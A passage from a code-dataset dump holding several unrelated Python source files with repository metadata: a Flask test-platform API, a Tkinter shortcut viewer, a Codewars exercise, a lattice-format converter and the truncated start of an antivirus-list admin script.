drawing):\r\n \"\"\" Creating a particle object. \"\"\"\r\n drawing.oval(self.x - self.radius,\r\n self.y - self.radius,\r\n self.x + self.radius,\r\n self.y + self.radius,\r\n color=self.color\r\n )","repo_name":"wcsrchoi/cs108-Final-Project","sub_path":"Final Project (Snake Game)/Particle.py","file_name":"Particle.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11873144845","text":"# -*- coding:utf-8 -*-\n\nimport json\n\nfrom datetime import datetime, timedelta\nfrom flask import Blueprint, request\nfrom flask_restful import Resource\n\nfrom atp.api.comm_log import logger\nfrom atp.api.mysql_manager import (ApiCompanyInfoManager, ApiSystemInfoManager, ApiProductLineManager,\n ApiTestcaseMainManager, ApiTestcaseSubManager)\nfrom atp.api.redis_api import RedisManager\nfrom atp.engine.return_code_desc import CODE_DESC_MAP\nfrom atp.utils.common import get_request_json, make_response, db_result_to_map\nfrom atp.views.wrappers import timer, login_check, master_check, developer_check\n\nredis = RedisManager()\napi_company = Blueprint('api_company_interface', __name__)\n\nsubtree_filter_conditions = ['用例编号', '接口url', '接口中文名']\nmain_subtree_filter_conditions = ['用例编号', '接口url', '接口中文名']\n\n\nclass ApiCompany(Resource):\n def __init__(self):\n self.data = get_request_json()\n self.username = redis.get_username(request.headers.get('X-Token'))\n self.acim = ApiCompanyInfoManager()\n self.asim = ApiSystemInfoManager()\n self.all_sub_objs = None\n\n @timer\n def post(self, action):\n if action == 'add':\n return self.add_company()\n\n elif action == 'edit':\n return self.edit_company()\n\n elif action == 'delete':\n return self.delete_company()\n\n elif action == 'list':\n return self.company_list()\n\n elif action == 'subtree':\n return self.subtree()\n\n elif action == 'projectSubtree':\n return self.project_subtree()\n\n elif action == 'productLineSubtree':\n return self.product_line_subtree()\n\n elif action == 'intfCaseSubtree':\n return self.intf_case_subtree()\n\n elif action == 'getFilterConditions':\n return make_response({\"code\": \"000\", \"conditions\": subtree_filter_conditions})\n\n elif action == 'subtreeFilter':\n return self.api_subtree_filter()\n\n elif action == 'mainSubtreeFilter':\n return self.api_main_subtree_filter()\n\n else:\n return make_response({\"code\": \"100\", \"desc\": \"url错误,不存在的接口动作<{action}>\".format(action=action)})\n\n @master_check\n def add_company(self):\n try:\n company_name = self.data.pop('companyName')\n simple_desc = self.data.pop('simpleDesc', None)\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": \"入参校验失败\"})\n\n company_name = str(company_name).strip()\n\n # 判断公司名是否已存在,存在无法添加\n if self.acim.get_company(company_name=company_name):\n return make_response({\"code\": \"201\", \"desc\": \"公司名称\\\"{}\\\"已存在\".format(company_name)})\n\n self.acim.insert_company(company_name=company_name, simple_desc=simple_desc, creator=self.username)\n return make_response({\"code\": \"000\", \"desc\": \"公司\\\"{}\\\"增加成功\".format(company_name)})\n\n @master_check\n def edit_company(self):\n try:\n company_id = self.data.pop('companyId')\n company_name = self.data.pop('companyName')\n simple_desc = self.data.pop('simpleDesc', None)\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": \"入参校验失败\"})\n\n if not self.acim.get_company(id=company_id):\n return make_response({\"code\": \"202\", \"desc\": \"公司id\\\"{}\\\"不存在, 请刷新后重试\".format(company_id)})\n elif self.acim.get_company(company_name=company_name):\n return make_response({\"code\": \"201\", \"desc\": \"公司名称\\\"{}\\\"已存在, 无法修改\".format(company_name)})\n\n self.acim.update_company(company_id, company_name=company_name, simple_desc=simple_desc,\n last_modifier=self.username)\n return make_response({\"code\": \"000\", \"desc\": \"公司\\\"{}\\\"修改成功\".format(company_name)})\n\n @login_check\n def company_list(self):\n res_list = []\n objs = self.acim.get_companies()\n for obj in objs:\n res_list.append(\n {\n 'companyId': obj.id,\n 'companyName': obj.company_name,\n 'simpleDesc': obj.simple_desc,\n 'creator': obj.creator,\n 'last_modifier': obj.last_modifier\n }\n )\n return make_response({\"code\": \"000\", \"companyList\": res_list})\n\n @master_check\n def delete_company(self):\n try:\n company_id = self.data.pop('companyId')\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": \"入参校验失败\"})\n\n if not self.acim.get_company(id=company_id):\n return make_response({\"code\": \"202\", \"desc\": \"公司id\\\"{}\\\"不存在, 请刷新后重��\".format(company_id)})\n\n system_objs = self.asim.get_systems(api_company_id=company_id)\n if system_objs:\n return make_response({\"code\": \"300\", \"desc\": \"公司下已配置{}个工程,无法直接删除公司\".format(len(system_objs))})\n\n self.acim.delete_company(company_id)\n return make_response({\"code\": \"000\", \"desc\": \"公司删除成功\"})\n\n @login_check\n def subtree(self):\n \"\"\"根据公司id查询配置在该公司下的系统-接口\"\"\"\n try:\n company_id = self.data.pop('companyId')\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": \"入参校验失败\"})\n\n subtree = []\n index_id = 1\n\n result_list = self.acim.query_api_subtree(company_id)\n # logger.info('result_list:{}'.format(json.dumps(result_list)))\n\n system_id_exist_list = []\n intf_id_exist_list = []\n for row in result_list:\n if row[0] not in system_id_exist_list and row[2] is None:\n system_id_exist_list.append(row[0])\n subtree.append(\n {\n 'id': index_id,\n 'label': row[1],\n 'systemId': row[0],\n 'gitSshURL': row[4],\n 'children': []\n }\n )\n index_id += 1\n elif row[0] not in system_id_exist_list and row[2] not in intf_id_exist_list:\n system_id_exist_list.append(row[0])\n intf_id_exist_list.append(row[2])\n subtree.append(\n {\n 'id': index_id,\n 'label': row[1],\n 'systemId': row[0],\n 'gitSshURL': row[4],\n 'children': [\n {\n 'id': index_id + 1,\n 'label': row[3],\n 'intfId': row[2]\n }\n ]\n }\n )\n index_id += 2\n elif row[0] in system_id_exist_list and row[2] not in intf_id_exist_list:\n intf_id_exist_list.append(row[2])\n for system in subtree:\n if row[0] == system['systemId']:\n system['children'].append(\n {\n 'id': index_id,\n 'label': row[3],\n 'intfId': row[2]\n }\n )\n break\n index_id += 1\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n @login_check\n def project_subtree(self):\n \"\"\"根据公司id查询配置在该公司下的项目-系统-接口-用例\"\"\"\n try:\n company_id = self.data.pop('companyId')\n recent_days = int(self.data.pop('recentDays', 0))\n except (KeyError, ValueError):\n return make_response({\"code\": \"100\", \"desc\": \"入参校验失败\"})\n\n if recent_days:\n today_date = datetime.date(datetime.now())\n start_day = today_date + timedelta(days=-int(recent_days))\n result_list = self.acim.query_api_project_subtree(company_id, start_day=start_day)\n else:\n result_list = self.acim.query_api_project_subtree(company_id)\n\n # logger.info('result_list:{}'.format(json.dumps(result_list)))\n patch_result_list = self.acim.query_api_project_subtree_patch(company_id)\n subtree = result_list_to_subtree(result_list, patch_result_list)\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n @login_check\n def product_line_subtree_old(self):\n \"\"\"根据公司id查询配置在该公司下的产品线-全链路用例\"\"\"\n try:\n company_id = self.data.pop('companyId')\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": CODE_DESC_MAP[\"100\"]})\n\n subtree = []\n index_id = 0\n\n result_list = self.acim.query_api_product_line_subtree(company_id)\n logger.debug(result_list)\n\n result_dic = db_result_to_map(result_list)\n logger.debug(result_dic)\n for p_k, p_dic in result_dic.items():\n p_name = p_dic.pop('name')\n index_id += 1\n p_tree = {\n 'id': index_id,\n 'label': p_name,\n 'productLineId': p_k,\n 'children': []\n }\n for t_k, t_dic in p_dic.items():\n t_name = t_dic.pop('name')\n index_id += 1\n t_tree = {\n 'id': index_id,\n 'label': t_name,\n 'testcaseId': t_k,\n 'children': []\n }\n p_tree['children'].append(t_tree)\n subtree.append(p_tree)\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n @login_check\n def product_line_subtree(self):\n \"\"\"根据公司id查询配置在该公司下的产品线-目录-目录-...-全链路用例\"\"\"\n try:\n company_id = self.data.pop('companyId')\n with_sub = self.data.pop('withSub', None)\n tag_id_list = self.data.pop('tagIdList', None)\n without_testcase = self.data.pop('withoutTestcase', None)\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": CODE_DESC_MAP[\"100\"]})\n\n if not (isinstance(tag_id_list, list) and len(tag_id_list) in [1, 2]):\n tag_id_list = None\n\n self.all_sub_objs = ApiTestcaseSubManager.get_testcase_subs()\n\n subtree = []\n index = 0\n\n pl_objs = ApiProductLineManager.get_product_lines(api_company_id=company_id)\n for pl_obj in pl_objs:\n index += 1\n top_tree = {\n 'id': index,\n 'label': pl_obj.product_line_name,\n 'productLineId': pl_obj.id,\n 'children': []\n }\n index = get_under_node(pl_obj.id, top_tree['children'], index, with_sub, tag_id_list, without_testcase,\n self.all_sub_objs)\n subtree.append(top_tree)\n\n if tag_id_list:\n # 过滤去除没有用例的节点\n remove_no_case_node(subtree)\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n @login_check\n def intf_case_subtree(self):\n \"\"\"根据公司id查询配置在该公司下的工程-接口-用例\"\"\"\n try:\n company_id = self.data.pop('companyId')\n except KeyError:\n return make_response({\"code\": \"100\", \"desc\": CODE_DESC_MAP[\"100\"]})\n\n subtree = []\n index_id = 0\n\n result_list = self.acim.query_api_intf_case_subtree(company_id)\n\n result_dic = db_result_to_map(result_list)\n for s_k, s_dic in result_dic.items():\n p_name = s_dic.pop('name')\n index_id += 1\n s_tree = {\n 'id': index_id,\n 'label': p_name,\n 'value': s_k,\n 'children': []\n }\n for i_k, i_dic in s_dic.items():\n t_name = i_dic.pop('name')\n index_id += 1\n i_tree = {\n 'id': index_id,\n 'label': t_name,\n 'value': i_k\n }\n for t_k, t_dic in i_dic.items():\n t_name = t_dic.pop('name')\n index_id += 1\n t_tree = {\n 'id': index_id,\n 'label': t_name,\n 'value': t_k\n }\n if 'children' not in i_tree:\n i_tree['children'] = []\n i_tree['children'].append(t_tree)\n s_tree['children'].append(i_tree)\n subtree.append(s_tree)\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n @login_check\n def api_subtree_filter(self):\n try:\n company_id = self.data.pop('companyId')\n filter_ = self.data.pop('filter')\n keyword = self.data.pop('keyword').strip()\n if not keyword:\n raise ValueError\n if filter_ not in subtree_filter_conditions:\n raise ValueError\n except (KeyError, ValueError):\n return make_response({\"code\": \"100\", \"desc\": CODE_DESC_MAP[\"100\"]})\n\n subtree = subtree_filter_by_keyword(company_id, filter_, keyword)\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n @login_check\n def api_main_subtree_filter(self):\n try:\n company_id = self.data.pop('companyId')\n filter_ = self.data.pop('filter')\n keyword = self.data.pop('keyword').strip()\n if not keyword:\n raise ValueError\n if filter_ not in subtree_filter_conditions:\n raise ValueError\n except (KeyError, ValueError):\n return make_response({\"code\": \"100\", \"desc\": CODE_DESC_MAP[\"100\"]})\n\n subtree = main_subtree_filter_by_keyword(company_id, filter_, keyword)\n\n return make_response({\"code\": \"000\", \"data\": subtree})\n\n\ndef get_under_node(parent_id, tree_list, index, with_sub, tag_id_list, without_testcase, all_sub_objs):\n pl_objs = ApiProductLineManager.get_product_lines(parent_id=parent_id)\n for pl_obj in pl_objs:\n index += 1\n tree = {\n 'id': index,\n 'label': pl_obj.product_line_name,\n 'productLineId': pl_obj.id,\n 'children': []\n }\n index = get_under_node(pl_obj.id, tree['children'], index, with_sub, tag_id_list, without_testcase,\n all_sub_objs)\n tree_list.append(tree)\n\n if without_testcase:\n return index\n\n # tm_objs = ApiTestcaseMainManager.get_testcase_mains(api_product_line_id=parent_id)\n res = ApiTestcaseMainManager.get_testcase_mains_in_tag(api_product_line_id=parent_id, tag_id_list=tag_id_list)\n\n for row in res:\n index += 1\n tree = {\n 'id': index,\n 'label': str(row[0]) + '_' + row[1],\n 'testcaseId': row[0],\n 'children': []\n }\n # 是否需要添加到子用例层\n if with_sub:\n sub_list = json.loads(row[2])\n\n # sub_objs = ApiTestcaseSubManager.get_testcase_subs_in_id_list(sub_list)\n # for sub_obj in sub_objs:\n # sub_tree = {\n # 'id': index,\n # 'label': sub_obj.sub_name,\n # 'subId': sub_obj.id,\n # }\n # tree['children'].append(sub_tree)\n\n # for sub_id in sub_list:\n # sub_obj = ApiTestcaseSubManager.get_testcase_sub(id=sub_id)\n # sub_tree = {\n # 'id': index,\n # 'label': sub_obj.sub_name,\n # 'subId': sub_id,\n # 'children': []\n # }\n # tree['children'].append(sub_tree)\n\n for sub_id in sub_list:\n for sub_obj in all_sub_objs:\n if sub_id == sub_obj.id:\n sub_tree = {\n 'id': index,\n 'label': sub_obj.sub_name,\n 'subId': sub_obj.id,\n }\n tree['children'].append(sub_tree)\n break\n\n tree_list.append(tree)\n return index\n\n\ndef remove_no_case_node(subtree):\n delete_flag = False\n for i in range(len(subtree) - 1, -1, -1):\n if 'testcaseId' in subtree[i]:\n break\n if subtree[i]['children']:\n delete_flag = remove_no_case_node(subtree[i]['children'])\n else:\n delete_flag = True\n if delete_flag:\n subtree.pop(i)\n\n return delete_flag\n\n\ndef result_list_to_subtree(result_list, patch_result_list=None):\n subtree = []\n index_id = 1\n result_dic = db_result_to_map(result_list, patch_result_list)\n for p_k, p_dic in result_dic.items():\n p_name = p_dic.pop('name')\n index_id += 1\n p_tree = {\n 'id': index_id,\n 'label': p_name,\n 'projectId': p_k,\n 'children': []\n }\n for s_k, s_dic in p_dic.items():\n s_name = s_dic.pop('name')\n index_id += 1\n s_tree = {\n 'id': index_id,\n 'label': s_name,\n 'systemId': s_k,\n 'children': []\n }\n for i_k, i_dic in s_dic.items():\n i_name = i_dic.pop('name')\n index_id += 1\n i_tree = {\n 'id': index_id,\n 'label': i_name,\n 'intfId': i_k,\n 'children': []\n }\n for t_k, t_dic in i_dic.items():\n index_id += 1\n t_tree = {\n 'id': index_id,\n 'label': '{0}_{1}'.format(t_k, t_dic['name']),\n 'testcaseId': t_k,\n }\n i_tree['children'].append(t_tree)\n s_tree['children'].append(i_tree)\n p_tree['children'].append(s_tree)\n subtree.append(p_tree)\n return subtree\n\n\ndef subtree_filter_by_keyword(company_id, filter_, keyword):\n result_list = []\n if filter_ == '用例编号':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_by_testcase_id(company_id, testcase_id=keyword)\n elif filter_ == 'testcaseName':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_like_testcase_name(company_id,\n testcase_name=keyword)\n elif filter_ == 'testcaseCreator':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_like_testcase_creator(company_id,\n testcase_creator=keyword)\n elif filter_ == '接口url':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_like_intf_url(company_id, intf_url=keyword)\n elif filter_ == '接口中文名':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_like_intf_desc(company_id, intf_desc=keyword)\n # print(len(result_list))\n if not result_list:\n result_list = subtree_filter_by_keyword_not_belong_project(company_id, filter_, keyword)\n return result_list_to_subtree(result_list)\n\n\ndef subtree_filter_by_keyword_not_belong_project(company_id, filter_, keyword):\n # 补充查询\n result_list = []\n if filter_ == '用例编号':\n result_list = ApiCompanyInfoManager.query_api_subtree_by_testcase_id(company_id, testcase_id=keyword)\n elif filter_ == '接口url':\n result_list = ApiCompanyInfoManager.query_api_subtree_like_intf_url(company_id, intf_url=keyword)\n elif filter_ == '接口中文名':\n result_list = ApiCompanyInfoManager.query_api_subtree_like_intf_desc(company_id, intf_desc=keyword)\n\n if result_list:\n # 补齐特殊的项目id和项目名称\n new_result_list = []\n for row in result_list:\n row = list(row)\n row.insert(0, -1)\n row.insert(1, '未归属到任何项目')\n new_result_list.append(row)\n result_list = new_result_list\n\n return result_list\n\n\ndef main_subtree_filter_by_keyword(company_id, filter_, keyword):\n result_list = []\n if filter_ == '用例编号':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_by_testcase_id(company_id, testcase_id=keyword)\n elif filter_ == '接口url':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_like_intf_url(company_id, intf_url=keyword)\n elif filter_ == '接口中文名':\n result_list = ApiCompanyInfoManager.query_api_project_subtree_like_intf_desc(company_id, intf_desc=keyword)\n\n print(len(result_list))\n return result_list_to_subtree(result_list)\n","repo_name":"ooqitech/ATP","sub_path":"atp-auto-core-open/atp/views/api_company.py","file_name":"api_company.py","file_ext":"py","file_size_in_byte":21310,"program_lang":"python","lang":"en","doc_type":"code","stars":152,"dataset":"github-code","pt":"53"} +{"seq_id":"15361057976","text":"import tkinter\r\nfrom tkinter import messagebox\r\nimport webbrowser\r\n\r\nimport xlrd\r\n\r\nlocation = \"data\\shorts.xlsx\"\r\nwb = xlrd.open_workbook(location)\r\nsheet = wb.sheet_by_index(0)\r\nsheet.cell_value(0, 0)\r\n\r\n\r\nclass Keyshorts(tkinter.Tk):\r\n def __init__(self, parent):\r\n tkinter.Tk.__init__(self, parent)\r\n self.parent = parent\r\n self.initialize()\r\n self.search_query = None\r\n self.search = None\r\n self.menubar = None\r\n self.drop = None\r\n self.searchbtn = None\r\n self.searchbox = None\r\n self.list = None\r\n self.scrollbar = None\r\n\r\n def initialize(self):\r\n def update():\r\n messagebox.showerror(\"No Update\", \"This is the alpha version\")\r\n\r\n def feedback():\r\n webbrowser.open('mailto:ristikmajumdar@protonmail.com?Subject=Feedback-To-KeyShorts', new=1)\r\n\r\n def bug():\r\n webbrowser.open('https://github.com/1bl4z3r/KeyShorts', new=1)\r\n\r\n def how():\r\n messagebox.showinfo(\"HowTo\", \"This is Alpha Version, so no HowTo\")\r\n\r\n def about():\r\n t = tkinter.Toplevel(self)\r\n t.title(\"About\")\r\n t.wm_iconbitmap('data\\logo.ico')\r\n t.geometry('300x100')\r\n\r\n more = tkinter.Label(t,\r\n text=u\"KeyShorts is a small freeware to provide all possible Keyboard shortcuts of various softwares and Operating Systems. Currently supporting Windows only.\",\r\n wraplength=300)\r\n more.pack()\r\n dev = tkinter.Label(t, text=u\"DEVELOPER-Ristik Majumdar\", wraplength=300)\r\n dev.pack()\r\n\r\n button = tkinter.Button(t, text=\"Got It!\", command=t.destroy)\r\n button.pack()\r\n\r\n self.grid()\r\n\r\n self.menubar = tkinter.Menu(self.parent)\r\n self.drop = tkinter.Menu(self.menubar, tearoff=0)\r\n self.drop.add_command(label=\"How To Use\", command=how)\r\n self.drop.add_command(label=\"About\", command=about)\r\n self.drop.add_separator()\r\n self.drop.add_command(label=\"Submit Feedback\", command=feedback)\r\n self.drop.add_command(label=\"Report A Bug\", command=bug)\r\n self.drop.add_command(label=\"Check For Updates\", command=update)\r\n\r\n self.menubar.add_cascade(label=\"Help\", menu=self.drop)\r\n self.menubar.add_command(label=\"Exit\", command=self.quit)\r\n self.config(menu=self.menubar)\r\n\r\n self.search_query = tkinter.StringVar()\r\n\r\n self.search = tkinter.Label(self, text=u\"Search: \")\r\n self.search.grid(column=0, row=0, sticky='EW')\r\n\r\n self.searchbox = tkinter.Entry(self, textvariable=self.search_query)\r\n self.searchbox.grid(column=1, row=0, sticky='EW')\r\n self.search_query.set(u\"Currently Unavailable\")\r\n\r\n self.searchbtn = tkinter.Button(self, text=u\"Find\") #\\U0001F50D\r\n self.searchbtn.grid(column=2, row=0, sticky='EW')\r\n\r\n self.list = tkinter.Listbox(self)\r\n self.scrollbar = tkinter.Scrollbar(self, orient=\"vertical\")\r\n\r\n self.list.config(yscrollcommand=self.scrollbar.set)\r\n self.scrollbar.config(command=self.list.yview)\r\n\r\n for i in range(sheet.nrows):\r\n self.list.insert(tkinter.END, \" \".join(sheet.row_values(i)))\r\n\r\n self.list.grid(row=1, column=0, sticky='NSEW', columnspan=2)\r\n self.list.columnconfigure(0, weight=1)\r\n\r\n self.scrollbar.grid(column=2, row=1, sticky='NS')\r\n self.grid_columnconfigure(1, weight=1)\r\n self.grid_rowconfigure(1, weight=1)\r\n\r\n self.resizable(False, True)\r\n self.update()\r\n self.geometry(self.geometry())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = Keyshorts(None)\r\n app.title('KeyShorts (0.0.2)')\r\n app.wm_iconbitmap('data\\logo.ico')\r\n app.geometry('1000x500')\r\n app.mainloop()\r\n","repo_name":"1bl4z3r/KeyShorts","sub_path":"KeyShorts.py","file_name":"KeyShorts.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23915233814","text":"# Task\n# Given an array of integers, remove the smallest value. Do not mutate the\n# original array/list. If there are multiple elements with the same value,\n# remove the one with a lower index. If you get an empty array/list, return an\n# empty array/list.\n\n# Don't change the order of the elements that are left.\n\n# Examples\n# * Input: [1,2,3,4,5], output = [2,3,4,5]\n# * Input: [5,3,2,1,4], output = [5,3,2,4]\n# * Input: [2,2,1,2,1], output = [2,2,2,1]\n\nimport codewars_test as test\n\n\ndef remove_smallest(numbers):\n if not numbers:\n return []\n result = []\n minimum = min(numbers)\n seen_minimum = False\n for number in numbers:\n if number == minimum and seen_minimum is False:\n seen_minimum = True\n else:\n result.append(number)\n return result\n\n\ntest.describe(\"remove_smallest\")\n\ntest.it(\"works for the examples\")\ntest.assert_equals(\n remove_smallest([1, 2, 3, 4, 5]), [2, 3, 4, 5], \"Wrong result for [1, 2, 3, 4, 5]\"\n)\ntest.assert_equals(\n remove_smallest([5, 3, 2, 1, 4]), [5, 3, 2, 4], \"Wrong result for [5, 3, 2, 1, 4]\"\n)\ntest.assert_equals(\n remove_smallest([1, 2, 3, 1, 1]), [2, 3, 1, 1], \"Wrong result for [1, 2, 3, 1, 1]\"\n)\ntest.assert_equals(remove_smallest([]), [], \"Wrong result for []\")\n\nfrom numpy.random import randint\n\n\ndef randlist():\n return list(randint(400, size=randint(1, 10)))\n\n\ntest.it(\"returns [] if list has only one element\")\nfor i in range(10):\n x = randint(1, 400)\n test.assert_equals(remove_smallest([x]), [], \"Wrong result for [{}]\".format(x))\n\ntest.it(\"returns a list that misses only one element\")\nfor i in range(10):\n arr = randlist()\n test.assert_equals(\n len(remove_smallest(arr[:])),\n len(arr) - 1,\n \"Wrong sized result for {}\".format(arr),\n )\n","repo_name":"JacksonJW/practice-problems-interview-prep","sub_path":"codewars/python/remove_the_minimum.py","file_name":"remove_the_minimum.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"724819193","text":"#!/usr/bin/env python\n# Calculate gripper position given shoulder pose and arm servo angles\n# can be used for real position (but usually get directly from \"get_gripper_xyz\")\n# but mostly used for arm movement planning\n\nimport sys\nimport roslib\nimport rospy, time\n\nimport tf\nfrom tf import TransformListener\n#import moveit_commander\n#from moveit_commander import MoveGroupCommander\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler\nimport geometry_msgs.msg\n# use numpy?\n\nclass GetGripperPose():\n def __init__(self):\n \n rospy.init_node('GetGripperPose')\n\n # returns absolute gripper_link xyz position from base_link\n def CalculateXYZ( right_arm,\n shoulder_position_x, \n shoulder_position_y, \n shoulder_position_z, \n right_arm_shoulder_rotate_angle,\n right_arm_shoulder_lift_angle,\n right_arm_elbow_rotate_angle,\n right_arm_elbow_bend_angle,\n right_arm_wrist_bend_angle):\n \n gripper_x = 0.0\n gripper_y = 0.0\n gripper_z = 0.0\n\n\n \n\n\nif __name__=='__main__':\n\n try:\n GetGripperPose()\n except rospy.ROSInterruptException:\n rospy.loginfo(\"Oops! Exception occurred.\") \n\n\n\n\n\n\n","repo_name":"shinselrobots/sheldon","sub_path":"sheldon_servos/src/sheldon_servos/calculate_gripper_xyz.py","file_name":"calculate_gripper_xyz.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24894181259","text":"from fnmatch import fnmatch\n\nfrom django.contrib.staticfiles.storage import staticfiles_storage\n\n\ndef load_manifest(*paths):\n \"\"\"Get manifest for static files.\n\n .. note:: This is experimental; use with caution.\n\n This is for use with Django's ``ManifestStaticFilesStorage``. Its\n main purpose is to provide a way to pass the static files manifest\n to JavaScript so that static paths can be generated correctly.\n\n The :func:`aructils.templatetags.arc.staticfiles_manifest` template\n tag wraps this function and can be used to inject the manifest into\n an entry point template as JSON.\n\n Args:\n paths: If no paths are passed, the entire manifest will be\n returned. If one or more paths or passed, the manifest will\n be filtered to include only those paths; these paths can be\n shell-style patterns with wildcards (e.g., 'path/*').\n\n Returns:\n dict: { path => manifest path }\n None: If ``ManifestStaticFilesStorage`` if isn't being used\n\n \"\"\"\n try:\n staticfiles_storage.load_manifest\n except AttributeError:\n return None\n else:\n manifest = staticfiles_storage.load_manifest()\n\n if paths:\n paths_to_remove = []\n for manifest_path in manifest:\n for path in paths:\n if not fnmatch(manifest_path, path):\n paths_to_remove.append(manifest_path)\n for manifest_path in paths_to_remove:\n del manifest[manifest_path]\n\n return manifest\n","repo_name":"PSU-OIT-ARC/django-arcutils","sub_path":"arcutils/staticfiles.py","file_name":"staticfiles.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"19402016434","text":"import ocelot.cpbd.elements as elements\nfrom ocelot.cpbd.beam import Twiss\nimport logging\n\ntry:\n import tfs\nexcept ImportError:\n logging.getLogger(__file__).warning(\n f\"Optional package: TFS-Pandas missing. {__name__} will lack functionality.\"\n )\n\n\n\n\ndef tfs_to_cell_and_optics(tfs_path):\n tfs_table = tfs.read(tfs_path)\n\n cell = convert_tfs_lattice(tfs_table)\n optics = optics_from_tfs(tfs_table)\n return cell, optics\n\ndef optics_from_tfs(tfs_table):\n twiss = Twiss()\n\n try:\n header = tfs_table.headers\n except AttributeError:\n tfs_table = tfs.read(tfs_table)\n header = tfs_table.headers\n\n twiss.E = header[\"ENERGY\"]\n twiss.emit_x = header[\"EX\"]\n twiss.emit_y = header[\"EY\"]\n rel_gamma = header[\"GAMMA\"]\n twiss.emit_xn = twiss.emit_x * rel_gamma\n twiss.emit_yn = twiss.emit_y * rel_gamma\n\n first = tfs_table.iloc[0]\n twiss.alpha_x = first[\"ALFX\"]\n twiss.alpha_y = first[\"ALFY\"]\n twiss.beta_x = first[\"BETX\"]\n twiss.beta_y = first[\"BETY\"]\n twiss.Dx = first[\"DX\"]\n twiss.Dy = first[\"DY\"]\n twiss.Dxp = first[\"DPX\"]\n twiss.Dyp = first[\"DPY\"]\n twiss.x = first[\"X\"]\n twiss.y = first[\"Y\"]\n twiss.xp = first[\"PX\"]\n twiss.yp = first[\"PY\"]\n\n return twiss\n\n\nclass UnsupportedMADXElementType(RuntimeError): pass\n\ndef convert_tfs_lattice(tfs_table, converter=None):\n if converter is None:\n converter = MADXLatticeConverter()\n\n for row in tfs_table.itertuples():\n yield converter.dispatch(row)\n\n\nclass MADXLatticeConverter:\n def dispatch(self, row):\n etype = row.KEYWORD\n etypelow = etype.lower()\n try:\n return getattr(self, f\"make_{etypelow}\")(row)\n except AttributeError:\n raise UnsupportedMADXElementType(\n f\"Unsupported element type: {etype}.\"\n )\n\n def make_marker(self, row):\n return elements.Marker(eid=row.NAME)\n\n def make_monitor(self, row):\n return elements.Monitor(eid=row.NAME, l = row.L)\n\n def make_drift(self, row):\n return elements.Drift(eid=row.NAME, l=row.L)\n\n def make_sbend(self, row):\n return elements.SBend(eid=row.NAME,\n l=row.L,\n angle=row.ANGLE,\n tilt=row.TILT,\n e1=row.E1,\n e2=row.E2)\n\n def make_rbend(self, row):\n return elements.RBend(eid=row.NAME,\n l=row.L,\n angle=row.ANGLE,\n k1=row.K1L/row.L,\n k2=row.K2L/row.L,\n tilt=row.TILT,\n e1=row.E1,\n e2=row.E2,\n fint=row.FINT,\n fintx=row.FINTX)\n\n def make_quadrupole(self, row):\n return elements.Quadrupole(eid=row.NAME,\n l=row.L,\n k1=row.K1L/row.L,\n tilt=row.TILT)\n\n def make_sextupole(self, row):\n return elements.Sextupole(eid=row.NAME,\n l=row.L,\n k2=row.K2L/row.L,\n tilt=row.TILT)\n\n def make_octupole(self, row):\n return elements.Octupole(eid=row.NAME,\n l=row.L,\n k3=row.K3L/row.L,\n tilt=row.TILT)\n\n def make_vkicker(self, row):\n return elements.Vcor(eid=row.NAME,\n l=row.L,\n angle=row.VKICK)\n def make_hkicker(self, row):\n return elements.Hcor(eid=row.NAME,\n l=row.L,\n angle=row.HKICK)\n","repo_name":"ocelot-collab/ocelot","sub_path":"ocelot/adaptors/tfs.py","file_name":"tfs.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"36804613559","text":"#!/usr/bin/env python3\n\"\"\"Операции с файлами\"\"\"\nimport json\nimport subprocess\nfrom argparse import ArgumentParser\n\n\nFILE_ACTION_DELETE = \"delete\"\nFILE_ACTION_CURE = \"cure\"\nFILE_ACTION_RESTORE = \"restore\"\nOPERATION_STATUS_SUCCESS = \"success\"\nOPERATION_STATUS_FAILED = \"failed\"\n\n\ndef get_malicious_list(host: str, action: str):\n cmd = [\"/usr/bin/ssh\", \"-o\", \"StrictHostKeyChecking=no\", \"root@\" + host]\n cmd.extend([\"imunify-antivirus\", \"malware\", \"malicious\", \"list\", \"--json\"])\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n proc.wait()\n proc_stdout = proc.stdout.read().decode(\"utf-8\")\n malicious_list = json.loads(proc_stdout)\n file_statuses = [\"cleanup_done\", \"cleanup_removed\"] if action == \"restore\" else [\"found\"]\n return [item[\"id\"] for item in malicious_list.get(\"items\", []) if item[\"status\"] in file_statuses]\n\n\ndef handle_operation(params, extended_cmd):\n \"\"\"\n Выполнение операции\n :param params: Параметры запуска операции\n :param extended_cmd: Команда для выполнения операции\n :return:\n \"\"\"\n operation_result = {\"action\": params.action, 